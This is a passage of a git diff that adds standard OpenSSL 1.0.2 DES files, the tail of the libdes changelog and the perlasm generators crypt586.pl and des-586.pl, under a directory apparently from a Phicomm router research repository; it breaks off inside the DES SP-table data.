+	 #defines.  I believe the code should work on any machine that
+	 defines long, int or short to be 8 bytes long.
+	Thanks to Shabbir J. Safdar (shabby@mentor.cc.purdue.edu)
+	 for helping me fix the code to run on 64bit machines (he had
+	 access to an ETA10).
+	Thanks also to John Fletcher <john_fletcher@lccmail.ocf.llnl.gov>
+	 for testing the routines on a CRAY.
+	read_password.c has been renamed to read_passwd.c
+	string_to_key.c has been renamed to string2key.c
+
+Version 2.00 14/09/92
+	Made mods so that the library should work on 64bit CPU's.
+	Removed all my uchar and ulong defs.  To many different
+	 versions of unix define them in their header files in too many
+	 different combinations :-)
+	IRIX - Sillicon Graphics mods (mostly in read_password.c).
+	 Thanks to Andrew Daviel (advax@erich.triumf.ca)
+
+Version 1.99 26/08/92
+	Fixed a bug or 2 in enc_read.c
+	Fixed a bug in enc_write.c
+	Fixed a pseudo bug in fcrypt.c (very obscure).
+
+Version 1.98 31/07/92
+	Support for the ETA10.  This is a strange machine that defines
+	longs and ints as 8 bytes and shorts as 4 bytes.
+	Since I do evil things with long * that assume that they are 4
+	bytes.  Look in the Makefile for the option to compile for
+	this machine.  quad_cksum appears to have problems but I
+	will don't have the time to fix it right now, and this is not
+	a function that uses DES and so will not effect the main uses
+	of the library.
+
+Version 1.97 20/05/92 eay
+	Fixed the Imakefile and made some changes to des.h to fix some
+	problems when building this package with Kerberos v 4.
+
+Version 1.96 18/05/92 eay
+	Fixed a small bug in string_to_key() where problems could
+	occur if des_check_key was set to true and the string
+	generated a weak key.
+
+Patch2 posted to comp.sources.misc
+Version 1.95 13/05/92 eay
+	Added an alternative version of the D_ENCRYPT macro in
+	ecb_encrypt and fcrypt.  Depending on the compiler, one version or the
+	other will be faster.  This was inspired by 
+	Dana How <how@isl.stanford.edu>, and her pointers about doing the
+	*(ulong *)((uchar *)ptr+(value&0xfc))
+	vs
+	ptr[value&0x3f]
+	to stop the C compiler doing a <<2 to convert the long array index.
+
+Version 1.94 05/05/92 eay
+	Fixed an incompatibility between my string_to_key and the MIT
+	 version.  When the key is longer than 8 chars, I was wrapping
+	 with a different method.  To use the old version, define
+	 OLD_STR_TO_KEY in the makefile.  Thanks to
+	 viktor@newsu.shearson.com (Viktor Dukhovni).
+
+Version 1.93 28/04/92 eay
+	Fixed the VMS mods so that echo is now turned off in
+	 read_password.  Thanks again to brennan@coco.cchs.su.oz.AU.
+	MSDOS support added.  The routines can be compiled with
+	 Turbo C (v2.0) and MSC (v5.1).  Make sure MSDOS is defined.
+
+Patch1 posted to comp.sources.misc
+Version 1.92 13/04/92 eay
+	Changed D_ENCRYPT so that the rotation of R occurs outside of
+	 the loop.  This required rotating all the longs in sp.h (now
+	 called spr.h). Thanks to Richard Outerbridge <71755.204@CompuServe.COM>
+	speed.c has been changed so it will work without SIGALRM.  If
+	 times(3) is not present it will try to use ftime() instead.
+
+Version 1.91 08/04/92 eay
+	Added -E/-D options to des(1) so it can use string_to_key.
+	Added SVR4 mods suggested by witr@rwwa.COM
+	Added VMS mods suggested by brennan@coco.cchs.su.oz.AU.  If
+	anyone knows how to turn of tty echo in VMS please tell me or
+	implement it yourself :-).
+	Changed FILE *IN/*OUT to *DES_IN/*DES_OUT since it appears VMS
+	does not like IN/OUT being used.
+
+Libdes posted to comp.sources.misc
+Version 1.9 24/03/92 eay
+	Now contains a fast small crypt replacement.
+	Added des(1) command.
+	Added des_rw_mode so people can use cbc encryption with
+	enc_read and enc_write.
+
+Version 1.8 15/10/91 eay
+	Bug in cbc_cksum.
+	Many thanks to Keith Reynolds (keithr@sco.COM) for pointing this
+	one out.
+
+Version 1.7 24/09/91 eay
+	Fixed set_key :-)
+	set_key is 4 times faster and takes less space.
+	There are a few minor changes that could be made.
+
+Version 1.6 19/09/1991 eay
+	Finally go IP and FP finished.
+	Now I need to fix set_key.
+	This version is quite a bit faster that 1.51
+
+Version 1.52 15/06/1991 eay
+	20% speedup in ecb_encrypt by changing the E bit selection
+	to use 2 32bit words.  This also required modification of the
+	sp table.  There is still a way to speedup the IP and IP-1
+	(hints from outer@sq.com) still working on this one :-(.
+
+Version 1.51 07/06/1991 eay
+	Faster des_encrypt by loop unrolling
+	Fixed bug in quad_cksum.c (thanks to hughes@logos.ucs.indiana.edu)
+
+Version 1.50 28/05/1991 eay
+	Optimised the code a bit more for the sparc.  I have improved the
+	speed of the inner des_encrypt by speeding up the initial and
+	final permutations.
+
+Version 1.40 23/10/1990 eay
+	Fixed des_random_key, it did not produce a random key :-(
+
+Version 1.30  2/10/1990 eay
+	Have made des_quad_cksum the same as MIT's, the full package
+	should be compatible with MIT's
+	Have tested on a DECstation 3100
+	Still need to fix des_set_key (make it faster).
+	Does des_cbc_encrypts at 70.5k/sec on a 3100.
+
+Version 1.20 18/09/1990 eay
+	Fixed byte order dependencies.
+	Fixed (I hope) all the word alignment problems.
+	Speedup in des_ecb_encrypt.
+
+Version 1.10 11/09/1990 eay
+	Added des_enc_read and des_enc_write.
+	Still need to fix des_quad_cksum.
+	Still need to document des_enc_read and des_enc_write.
+
+Version 1.00 27/08/1990 eay
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/asm/crypt586.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/asm/crypt586.pl
new file mode 100644
index 0000000..e36f7d4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/asm/crypt586.pl
@@ -0,0 +1,209 @@
+#!/usr/local/bin/perl
+#
+# The inner loop instruction sequence and the IP/FP modifications are from
+# Svend Olaf Mikkelsen <svolaf@inet.uni-c.dk>
+# I've added the stuff needed for crypt() but I've not worried about making
+# things perfect.
+#
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+push(@INC,"${dir}","${dir}../../perlasm");
+require "x86asm.pl";
+
+&asm_init($ARGV[0],"crypt586.pl");
+
+$L="edi";
+$R="esi";
+
+&external_label("DES_SPtrans");
+&fcrypt_body("fcrypt_body");
+&asm_finish();
+
+sub fcrypt_body
+	{
+	local($name,$do_ip)=@_;
+
+	&function_begin($name);
+
+	&comment("");
+	&comment("Load the 2 words");
+	$trans="ebp";
+
+	&xor(	$L,	$L);
+	&xor(	$R,	$R);
+
+	# PIC-ification:-)
+	&picmeup("edx","DES_SPtrans");
+	#if ($cpp)	{ &picmeup("edx","DES_SPtrans");   }
+	#else		{ &lea("edx",&DWP("DES_SPtrans")); }
+	&push("edx");	# becomes &swtmp(1)
+	#
+	&mov($trans,&wparam(1)); # reloaded with DES_SPtrans in D_ENCRYPT
+
+	&push(&DWC(25)); # add a variable
+
+	&set_label("start");
+	for ($i=0; $i<16; $i+=2)
+		{
+		&comment("");
+		&comment("Round $i");
+		&D_ENCRYPT($i,$L,$R,$i*2,$trans,"eax","ebx","ecx","edx");
+
+		&comment("");
+		&comment("Round ".sprintf("%d",$i+1));
+		&D_ENCRYPT($i+1,$R,$L,($i+1)*2,$trans,"eax","ebx","ecx","edx");
+		}
+	 &mov("ebx",	&swtmp(0));
+	&mov("eax",	$L);
+	 &dec("ebx");
+	&mov($L,	$R);
+	 &mov($R,	"eax");
+	&mov(&swtmp(0),	"ebx");
+	 &jnz(&label("start"));
+
+	&comment("");
+	&comment("FP");
+	&mov("edx",&wparam(0));
+
+	&FP_new($R,$L,"eax",3);
+	&mov(&DWP(0,"edx","",0),"eax");
+	&mov(&DWP(4,"edx","",0),$L);
+
+	&add("esp",8);	# remove variables
+
+	&function_end($name);
+	}
+
+sub D_ENCRYPT
+	{
+	local($r,$L,$R,$S,$trans,$u,$tmp1,$tmp2,$t)=@_;
+
+	&mov(	$u,		&wparam(2));			# 2
+	&mov(	$t,		$R);
+	&shr(	$t,		16);				# 1
+	&mov(	$tmp2,		&wparam(3));			# 2
+	&xor(	$t,		$R);				# 1
+
+	&and(	$u,		$t);				# 2
+	&and(	$t,		$tmp2);				# 2
+
+	&mov(	$tmp1,		$u);
+	&shl(	$tmp1,		16); 				# 1
+	&mov(	$tmp2,		$t);
+	&shl(	$tmp2,		16); 				# 1
+	&xor(	$u,		$tmp1);				# 2
+	&xor(	$t,		$tmp2);				# 2
+	&mov(	$tmp1,		&DWP(&n2a($S*4),$trans,"",0));	# 2
+	&xor(	$u,		$tmp1);
+	&mov(	$tmp2,		&DWP(&n2a(($S+1)*4),$trans,"",0));	# 2
+	&xor(	$u,		$R);
+	&xor(	$t,		$R);
+	&xor(	$t,		$tmp2);
+
+	&and(	$u,		"0xfcfcfcfc"	);		# 2
+	&xor(	$tmp1,		$tmp1);				# 1
+	&and(	$t,		"0xcfcfcfcf"	);		# 2
+	&xor(	$tmp2,		$tmp2);	
+	&movb(	&LB($tmp1),	&LB($u)	);
+	&movb(	&LB($tmp2),	&HB($u)	);
+	&rotr(	$t,		4		);
+	&mov(	$trans,		&swtmp(1));
+	&xor(	$L,		&DWP("     ",$trans,$tmp1,0));
+	&movb(	&LB($tmp1),	&LB($t)	);
+	&xor(	$L,		&DWP("0x200",$trans,$tmp2,0));
+	&movb(	&LB($tmp2),	&HB($t)	);
+	&shr(	$u,		16);
+	&xor(	$L,		&DWP("0x100",$trans,$tmp1,0));
+	&movb(	&LB($tmp1),	&HB($u)	);
+	&shr(	$t,		16);
+	&xor(	$L,		&DWP("0x300",$trans,$tmp2,0));
+	&movb(	&LB($tmp2),	&HB($t)	);
+	&and(	$u,		"0xff"	);
+	&and(	$t,		"0xff"	);
+	&mov(	$tmp1,		&DWP("0x600",$trans,$tmp1,0));
+	&xor(	$L,		$tmp1);
+	&mov(	$tmp1,		&DWP("0x700",$trans,$tmp2,0));
+	&xor(	$L,		$tmp1);
+	&mov(	$tmp1,		&DWP("0x400",$trans,$u,0));
+	&xor(	$L,		$tmp1);
+	&mov(	$tmp1,		&DWP("0x500",$trans,$t,0));
+	&xor(	$L,		$tmp1);
+	&mov(	$trans,		&wparam(1));
+	}
+
+sub n2a
+	{
+	sprintf("%d",$_[0]);
+	}
+
+# now has a side affect of rotating $a by $shift
+sub R_PERM_OP
+	{
+	local($a,$b,$tt,$shift,$mask,$last)=@_;
+
+	&rotl(	$a,		$shift		) if ($shift != 0);
+	&mov(	$tt,		$a		);
+	&xor(	$a,		$b		);
+	&and(	$a,		$mask		);
+	if ($notlast eq $b)
+		{
+		&xor(	$b,		$a		);
+		&xor(	$tt,		$a		);
+		}
+	else
+		{
+		&xor(	$tt,		$a		);
+		&xor(	$b,		$a		);
+		}
+	&comment("");
+	}
+
+sub IP_new
+	{
+	local($l,$r,$tt,$lr)=@_;
+
+	&R_PERM_OP($l,$r,$tt, 4,"0xf0f0f0f0",$l);
+	&R_PERM_OP($r,$tt,$l,20,"0xfff0000f",$l);
+	&R_PERM_OP($l,$tt,$r,14,"0x33333333",$r);
+	&R_PERM_OP($tt,$r,$l,22,"0x03fc03fc",$r);
+	&R_PERM_OP($l,$r,$tt, 9,"0xaaaaaaaa",$r);
+	
+	if ($lr != 3)
+		{
+		if (($lr-3) < 0)
+			{ &rotr($tt,	3-$lr); }
+		else	{ &rotl($tt,	$lr-3); }
+		}
+	if ($lr != 2)
+		{
+		if (($lr-2) < 0)
+			{ &rotr($r,	2-$lr); }
+		else	{ &rotl($r,	$lr-2); }
+		}
+	}
+
+sub FP_new
+	{
+	local($l,$r,$tt,$lr)=@_;
+
+	if ($lr != 2)
+		{
+		if (($lr-2) < 0)
+			{ &rotl($r,	2-$lr); }
+		else	{ &rotr($r,	$lr-2); }
+		}
+	if ($lr != 3)
+		{
+		if (($lr-3) < 0)
+			{ &rotl($l,	3-$lr); }
+		else	{ &rotr($l,	$lr-3); }
+		}
+
+	&R_PERM_OP($l,$r,$tt, 0,"0xaaaaaaaa",$r);
+	&R_PERM_OP($tt,$r,$l,23,"0x03fc03fc",$r);
+	&R_PERM_OP($l,$r,$tt,10,"0x33333333",$l);
+	&R_PERM_OP($r,$tt,$l,18,"0xfff0000f",$l);
+	&R_PERM_OP($l,$tt,$r,12,"0xf0f0f0f0",$r);
+	&rotr($tt	, 4);
+	}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/asm/des-586.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/asm/des-586.pl
new file mode 100644
index 0000000..bd6a7dd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/asm/des-586.pl
@@ -0,0 +1,455 @@
+#!/usr/local/bin/perl
+#
+# The inner loop instruction sequence and the IP/FP modifications are from
+# Svend Olaf Mikkelsen <svolaf@inet.uni-c.dk>
+#
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+push(@INC,"${dir}","${dir}../../perlasm");
+require "x86asm.pl";
+require "cbc.pl";
+require "desboth.pl";
+
+# base code is in microsft
+# op dest, source
+# format.
+#
+
+&asm_init($ARGV[0],"des-586.pl");
+
+$L="edi";
+$R="esi";
+$trans="ebp";
+$small_footprint=1 if (grep(/\-DOPENSSL_SMALL_FOOTPRINT/,@ARGV));
+# one can discuss setting this variable to 1 unconditionally, as
+# the folded loop is only 3% slower than unrolled, but >7 times smaller
+
+&public_label("DES_SPtrans");
+&static_label("des_sptrans");
+
+&DES_encrypt_internal();
+&DES_decrypt_internal();
+&DES_encrypt("DES_encrypt1",1);
+&DES_encrypt("DES_encrypt2",0);
+&DES_encrypt3("DES_encrypt3",1);
+&DES_encrypt3("DES_decrypt3",0);
+&cbc("DES_ncbc_encrypt","DES_encrypt1","DES_encrypt1",0,4,5,3,5,-1);
+&cbc("DES_ede3_cbc_encrypt","DES_encrypt3","DES_decrypt3",0,6,7,3,4,5);
+&DES_SPtrans();
+
+&asm_finish();
+
+sub DES_encrypt_internal()
+	{
+	&function_begin_B("_x86_DES_encrypt");
+
+	if ($small_footprint)
+	    {
+	    &lea("edx",&DWP(128,"ecx"));
+	    &push("edx");
+	    &push("ecx");
+	    &set_label("eloop");
+		&D_ENCRYPT(0,$L,$R,0,$trans,"eax","ebx","ecx","edx",&swtmp(0));
+		&comment("");
+		&D_ENCRYPT(1,$R,$L,2,$trans,"eax","ebx","ecx","edx",&swtmp(0));
+		&comment("");
+		&add("ecx",16);
+		&cmp("ecx",&swtmp(1));
+		&mov(&swtmp(0),"ecx");
+		&jb(&label("eloop"));
+	    &add("esp",8);
+	    }
+	else
+	    {
+	    &push("ecx");
+	    for ($i=0; $i<16; $i+=2)
+		{
+		&comment("Round $i");
+		&D_ENCRYPT($i,$L,$R,$i*2,$trans,"eax","ebx","ecx","edx",&swtmp(0));
+		&comment("Round ".sprintf("%d",$i+1));
+		&D_ENCRYPT($i+1,$R,$L,($i+1)*2,$trans,"eax","ebx","ecx","edx",&swtmp(0));
+		}
+	    &add("esp",4);
+	}
+	&ret();
+
+	&function_end_B("_x86_DES_encrypt");
+	}
+	
+sub DES_decrypt_internal()
+	{
+	&function_begin_B("_x86_DES_decrypt");
+
+	if ($small_footprint)
+	    {
+	    &push("ecx");
+	    &lea("ecx",&DWP(128,"ecx"));
+	    &push("ecx");
+	    &set_label("dloop");
+		&D_ENCRYPT(0,$L,$R,-2,$trans,"eax","ebx","ecx","edx",&swtmp(0));
+		&comment("");
+		&D_ENCRYPT(1,$R,$L,-4,$trans,"eax","ebx","ecx","edx",&swtmp(0));
+		&comment("");
+		&sub("ecx",16);
+		&cmp("ecx",&swtmp(1));
+		&mov(&swtmp(0),"ecx");
+		&ja(&label("dloop"));
+	    &add("esp",8);
+	    }
+	else
+	    {
+	    &push("ecx");
+	    for ($i=15; $i>0; $i-=2)
+		{
+		&comment("Round $i");
+		&D_ENCRYPT(15-$i,$L,$R,$i*2,$trans,"eax","ebx","ecx","edx",&swtmp(0));
+		&comment("Round ".sprintf("%d",$i-1));
+		&D_ENCRYPT(15-$i+1,$R,$L,($i-1)*2,$trans,"eax","ebx","ecx","edx",&swtmp(0));
+		}
+	    &add("esp",4);
+	    }
+	&ret();
+
+	&function_end_B("_x86_DES_decrypt");
+	}
+	
+sub DES_encrypt
+	{
+	local($name,$do_ip)=@_;
+
+	&function_begin_B($name);
+
+	&push("esi");
+	&push("edi");
+
+	&comment("");
+	&comment("Load the 2 words");
+
+	if ($do_ip)
+		{
+		&mov($R,&wparam(0));
+		 &xor(	"ecx",		"ecx"		);
+
+		&push("ebx");
+		&push("ebp");
+
+		&mov("eax",&DWP(0,$R,"",0));
+		 &mov("ebx",&wparam(2));	# get encrypt flag
+		&mov($L,&DWP(4,$R,"",0));
+		&comment("");
+		&comment("IP");
+		&IP_new("eax",$L,$R,3);
+		}
+	else
+		{
+		&mov("eax",&wparam(0));
+		 &xor(	"ecx",		"ecx"		);
+
+		&push("ebx");
+		&push("ebp");
+
+		&mov($R,&DWP(0,"eax","",0));
+		 &mov("ebx",&wparam(2));	# get encrypt flag
+		&rotl($R,3);
+		&mov($L,&DWP(4,"eax","",0));
+		&rotl($L,3);
+		}
+
+	# PIC-ification:-)
+	&call	(&label("pic_point"));
+	&set_label("pic_point");
+	&blindpop($trans);
+	&lea	($trans,&DWP(&label("des_sptrans")."-".&label("pic_point"),$trans));
+
+	&mov(	"ecx",	&wparam(1)	);
+
+	&cmp("ebx","0");
+	&je(&label("decrypt"));
+	&call("_x86_DES_encrypt");
+	&jmp(&label("done"));
+	&set_label("decrypt");
+	&call("_x86_DES_decrypt");
+	&set_label("done");
+
+	if ($do_ip)
+		{
+		&comment("");
+		&comment("FP");
+		&mov("edx",&wparam(0));
+		&FP_new($L,$R,"eax",3);
+
+		&mov(&DWP(0,"edx","",0),"eax");
+		&mov(&DWP(4,"edx","",0),$R);
+		}
+	else
+		{
+		&comment("");
+		&comment("Fixup");
+		&rotr($L,3);		# r
+		 &mov("eax",&wparam(0));
+		&rotr($R,3);		# l
+		 &mov(&DWP(0,"eax","",0),$L);
+		 &mov(&DWP(4,"eax","",0),$R);
+		}
+
+	&pop("ebp");
+	&pop("ebx");
+	&pop("edi");
+	&pop("esi");
+	&ret();
+
+	&function_end_B($name);
+	}
+
+sub D_ENCRYPT
+	{
+	local($r,$L,$R,$S,$trans,$u,$tmp1,$tmp2,$t,$wp1)=@_;
+
+	 &mov(	$u,		&DWP(&n2a($S*4),$tmp2,"",0));
+	&xor(	$tmp1,		$tmp1);
+	 &mov(	$t,		&DWP(&n2a(($S+1)*4),$tmp2,"",0));
+	&xor(	$u,		$R);
+	&xor(	$tmp2,		$tmp2);
+	 &xor(	$t,		$R);
+	&and(	$u,		"0xfcfcfcfc"	);
+	 &and(	$t,		"0xcfcfcfcf"	);
+	&movb(	&LB($tmp1),	&LB($u)	);
+	 &movb(	&LB($tmp2),	&HB($u)	);
+	&rotr(	$t,		4		);
+	&xor(	$L,		&DWP("     ",$trans,$tmp1,0));
+	 &movb(	&LB($tmp1),	&LB($t)	);
+	 &xor(	$L,		&DWP("0x200",$trans,$tmp2,0));
+	 &movb(	&LB($tmp2),	&HB($t)	);
+	&shr(	$u,		16);
+	 &xor(	$L,		&DWP("0x100",$trans,$tmp1,0));
+	 &movb(	&LB($tmp1),	&HB($u)	);
+	&shr(	$t,		16);
+	 &xor(	$L,		&DWP("0x300",$trans,$tmp2,0));
+	&movb(	&LB($tmp2),	&HB($t)	);
+	 &and(	$u,		"0xff"	);
+	&and(	$t,		"0xff"	);
+	 &xor(	$L,		&DWP("0x600",$trans,$tmp1,0));
+	 &xor(	$L,		&DWP("0x700",$trans,$tmp2,0));
+	&mov(	$tmp2,		$wp1	);
+	 &xor(	$L,		&DWP("0x400",$trans,$u,0));
+	 &xor(	$L,		&DWP("0x500",$trans,$t,0));
+	}
+
+sub n2a
+	{
+	sprintf("%d",$_[0]);
+	}
+
+# now has a side affect of rotating $a by $shift
+sub R_PERM_OP
+	{
+	local($a,$b,$tt,$shift,$mask,$last)=@_;
+
+	&rotl(	$a,		$shift		) if ($shift != 0);
+	&mov(	$tt,		$a		);
+	&xor(	$a,		$b		);
+	&and(	$a,		$mask		);
+	# This can never succeed, and besides it is difficult to see what the
+	# idea was - Ben 13 Feb 99
+	if (!$last eq $b)
+		{
+		&xor(	$b,		$a		);
+		&xor(	$tt,		$a		);
+		}
+	else
+		{
+		&xor(	$tt,		$a		);
+		&xor(	$b,		$a		);
+		}
+	&comment("");
+	}
+
+sub IP_new
+	{
+	local($l,$r,$tt,$lr)=@_;
+
+	&R_PERM_OP($l,$r,$tt, 4,"0xf0f0f0f0",$l);
+	&R_PERM_OP($r,$tt,$l,20,"0xfff0000f",$l);
+	&R_PERM_OP($l,$tt,$r,14,"0x33333333",$r);
+	&R_PERM_OP($tt,$r,$l,22,"0x03fc03fc",$r);
+	&R_PERM_OP($l,$r,$tt, 9,"0xaaaaaaaa",$r);
+	
+	if ($lr != 3)
+		{
+		if (($lr-3) < 0)
+			{ &rotr($tt,	3-$lr); }
+		else	{ &rotl($tt,	$lr-3); }
+		}
+	if ($lr != 2)
+		{
+		if (($lr-2) < 0)
+			{ &rotr($r,	2-$lr); }
+		else	{ &rotl($r,	$lr-2); }
+		}
+	}
+
+sub FP_new
+	{
+	local($l,$r,$tt,$lr)=@_;
+
+	if ($lr != 2)
+		{
+		if (($lr-2) < 0)
+			{ &rotl($r,	2-$lr); }
+		else	{ &rotr($r,	$lr-2); }
+		}
+	if ($lr != 3)
+		{
+		if (($lr-3) < 0)
+			{ &rotl($l,	3-$lr); }
+		else	{ &rotr($l,	$lr-3); }
+		}
+
+	&R_PERM_OP($l,$r,$tt, 0,"0xaaaaaaaa",$r);
+	&R_PERM_OP($tt,$r,$l,23,"0x03fc03fc",$r);
+	&R_PERM_OP($l,$r,$tt,10,"0x33333333",$l);
+	&R_PERM_OP($r,$tt,$l,18,"0xfff0000f",$l);
+	&R_PERM_OP($l,$tt,$r,12,"0xf0f0f0f0",$r);
+	&rotr($tt	, 4);
+	}
+
+sub DES_SPtrans
+	{
+	&set_label("DES_SPtrans",64);
+	&set_label("des_sptrans");
+	&data_word(0x02080800, 0x00080000, 0x02000002, 0x02080802);
+	&data_word(0x02000000, 0x00080802, 0x00080002, 0x02000002);
+	&data_word(0x00080802, 0x02080800, 0x02080000, 0x00000802);
+	&data_word(0x02000802, 0x02000000, 0x00000000, 0x00080002);
+	&data_word(0x00080000, 0x00000002, 0x02000800, 0x00080800);
+	&data_word(0x02080802, 0x02080000, 0x00000802, 0x02000800);
+	&data_word(0x00000002, 0x00000800, 0x00080800, 0x02080002);
+	&data_word(0x00000800, 0x02000802, 0x02080002, 0x00000000);
+	&data_word(0x00000000, 0x02080802, 0x02000800, 0x00080002);
+	&data_word(0x02080800, 0x00080000, 0x00000802, 0x02000800);
+	&data_word(0x02080002, 0x00000800, 0x00080800, 0x02000002);
+	&data_word(0x00080802, 0x00000002, 0x02000002, 0x02080000);
+	&data_word(0x02080802, 0x00080800, 0x02080000, 0x02000802);
+	&data_word(0x02000000, 0x00000802, 0x00080002, 0x00000000);
+	&data_word(0x00080000, 0x02000000, 0x02000802, 0x02080800);
+	&data_word(0x00000002, 0x02080002, 0x00000800, 0x00080802);
+	# nibble 1
+	&data_word(0x40108010, 0x00000000, 0x00108000, 0x40100000);
+	&data_word(0x40000010, 0x00008010, 0x40008000, 0x00108000);
+	&data_word(0x00008000, 0x40100010, 0x00000010, 0x40008000);
+	&data_word(0x00100010, 0x40108000, 0x40100000, 0x00000010);
+	&data_word(0x00100000, 0x40008010, 0x40100010, 0x00008000);
+	&data_word(0x00108010, 0x40000000, 0x00000000, 0x00100010);
+	&data_word(0x40008010, 0x00108010, 0x40108000, 0x40000010);
+	&data_word(0x40000000, 0x00100000, 0x00008010, 0x40108010);
+	&data_word(0x00100010, 0x40108000, 0x40008000, 0x00108010);
+	&data_word(0x40108010, 0x00100010, 0x40000010, 0x00000000);
+	&data_word(0x40000000, 0x00008010, 0x00100000, 0x40100010);
+	&data_word(0x00008000, 0x40000000, 0x00108010, 0x40008010);
+	&data_word(0x40108000, 0x00008000, 0x00000000, 0x40000010);
+	&data_word(0x00000010, 0x40108010, 0x00108000, 0x40100000);
+	&data_word(0x40100010, 0x00100000, 0x00008010, 0x40008000);
+	&data_word(0x40008010, 0x00000010, 0x40100000, 0x00108000);
+	# nibble 2
+	&data_word(0x04000001, 0x04040100, 0x00000100, 0x04000101);
+	&data_word(0x00040001, 0x04000000, 0x04000101, 0x00040100);
+	&data_word(0x04000100, 0x00040000, 0x04040000, 0x00000001);
+	&data_word(0x04040101, 0x00000101, 0x00000001, 0x04040001);
+	&data_word(0x00000000, 0x00040001, 0x04040100, 0x00000100);
+	&data_word(0x00000101, 0x04040101, 0x00040000, 0x04000001);
+	&data_word(0x04040001, 0x04000100, 0x00040101, 0x04040000);
+	&data_word(0x00040100, 0x00000000, 0x04000000, 0x00040101);
+	&data_word(0x04040100, 0x00000100, 0x00000001, 0x00040000);
+	&data_word(0x00000101, 0x00040001, 0x04040000, 0x04000101);
+	&data_word(0x00000000, 0x04040100, 0x00040100, 0x04040001);
+	&data_word(0x00040001, 0x04000000, 0x04040101, 0x00000001);
+	&data_word(0x00040101, 0x04000001, 0x04000000, 0x04040101);
+	&data_word(0x00040000, 0x04000100, 0x04000101, 0x00040100);
+	&data_word(0x04000100, 0x00000000, 0x04040001, 0x00000101);
+	&data_word(0x04000001, 0x00040101, 0x00000100, 0x04040000);
+	# nibble 3
+	&data_word(0x00401008, 0x10001000, 0x00000008, 0x10401008);
+	&data_word(0x00000000, 0x10400000, 0x10001008, 0x00400008);
+	&data_word(0x10401000, 0x10000008, 0x10000000, 0x00001008);
+	&data_word(0x10000008, 0x00401008, 0x00400000, 0x10000000);
+	&data_word(0x10400008, 0x00401000, 0x00001000, 0x00000008);
+	&data_word(0x00401000, 0x10001008, 0x10400000, 0x00001000);
+	&data_word(0x00001008, 0x00000000, 0x00400008, 0x10401000);
+	&data_word(0x10001000, 0x10400008, 0x10401008, 0x00400000);
+	&data_word(0x10400008, 0x00001008, 0x00400000, 0x10000008);
+	&data_word(0x00401000, 0x10001000, 0x00000008, 0x10400000);
+	&data_word(0x10001008, 0x00000000, 0x00001000, 0x00400008);
+	&data_word(0x00000000, 0x10400008, 0x10401000, 0x00001000);
+	&data_word(0x10000000, 0x10401008, 0x00401008, 0x00400000);
+	&data_word(0x10401008, 0x00000008, 0x10001000, 0x00401008);
+	&data_word(0x00400008, 0x00401000, 0x10400000, 0x10001008);
+	&data_word(0x00001008, 0x10000000, 0x10000008, 0x10401000);
+	# nibble 4
+	&data_word(0x08000000, 0x00010000, 0x00000400, 0x08010420);
+	&data_word(0x08010020, 0x08000400, 0x00010420, 0x08010000);
+	&data_word(0x00010000, 0x00000020, 0x08000020, 0x00010400);
+	&data_word(0x08000420, 0x08010020, 0x08010400, 0x00000000);
+	&data_word(0x00010400, 0x08000000, 0x00010020, 0x00000420);
+	&data_word(0x08000400, 0x00010420, 0x00000000, 0x08000020);
+	&data_word(0x00000020, 0x08000420, 0x08010420, 0x00010020);
+	&data_word(0x08010000, 0x00000400, 0x00000420, 0x08010400);
+	&data_word(0x08010400, 0x08000420, 0x00010020, 0x08010000);
+	&data_word(0x00010000, 0x00000020, 0x08000020, 0x08000400);
+	&data_word(0x08000000, 0x00010400, 0x08010420, 0x00000000);
+	&data_word(0x00010420, 0x08000000, 0x00000400, 0x00010020);
+	&data_word(0x08000420, 0x00000400, 0x00000000, 0x08010420);
+	&data_word(0x08010020, 0x08010400, 0x00000420, 0x00010000);
+	&data_word(0x00010400, 0x08010020, 0x08000400, 0x00000420);
+	&data_word(0x00000020, 0x00010420, 0x08010000, 0x08000020);
+	# nibble 5
+	&data_word(0x80000040, 0x00200040, 0x00000000, 0x80202000);
+	&data_word(0x00200040, 0x00002000, 0x80002040, 0x00200000);
+	&data_word(0x00002040, 0x80202040, 0x00202000, 0x80000000);
+	&data_word(0x80002000, 0x80000040, 0x80200000, 0x00202040);
+	&data_word(0x00200000, 0x80002040, 0x80200040, 0x00000000);
+	&data_word(0x00002000, 0x00000040, 0x80202000, 0x80200040);
+	&data_word(0x80202040, 0x80200000, 0x80000000, 0x00002040);
+	&data_word(0x00000040, 0x00202000, 0x00202040, 0x80002000);
+	&data_word(0x00002040, 0x80000000, 0x80002000, 0x00202040);
+	&data_word(0x80202000, 0x00200040, 0x00000000, 0x80002000);
+	&data_word(0x80000000, 0x00002000, 0x80200040, 0x00200000);
+	&data_word(0x00200040, 0x80202040, 0x00202000, 0x00000040);
+	&data_word(0x80202040, 0x00202000, 0x00200000, 0x80002040);
+	&data_word(0x80000040, 0x80200000, 0x00202040, 0x00000000);
+	&data_word(0x00002000, 0x80000040, 0x80002040, 0x80202000);
+	&data_word(0x80200000, 0x00002040, 0x00000040, 0x80200040);
+	# nibble 6
+	&data_word(0x00004000, 0x00000200, 0x01000200, 0x01000004);
+	&data_word(0x01004204, 0x00004004, 0x00004200, 0x00000000);
+	&data_word(0x01000000, 0x01000204, 0x00000204, 0x01004000);
+	&data_word(0x00000004, 0x01004200, 0x01004000, 0x00000204);
+	&data_word(0x01000204, 0x00004000, 0x00004004, 0x01004204);
+	&data_word(0x00000000, 0x01000200, 0x01000004, 0x00004200);
+	&data_word(0x01004004, 0x00004204, 0x01004200, 0x00000004);
+	&data_word(0x00004204, 0x01004004, 0x00000200, 0x01000000);
+	&data_word(0x00004204, 0x01004000, 0x01004004, 0x00000204);
+	&data_word(0x00004000, 0x00000200, 0x01000000, 0x01004004);
+	&data_word(0x01000204, 0x00004204, 0x00004200, 0x00000000);
+	&data_word(0x00000200, 0x01000004, 0x00000004, 0x01000200);
+	&data_word(0x00000000, 0x01000204, 0x01000200, 0x00004200);
+	&data_word(0x00000204, 0x00004000, 0x01004204, 0x01000000);
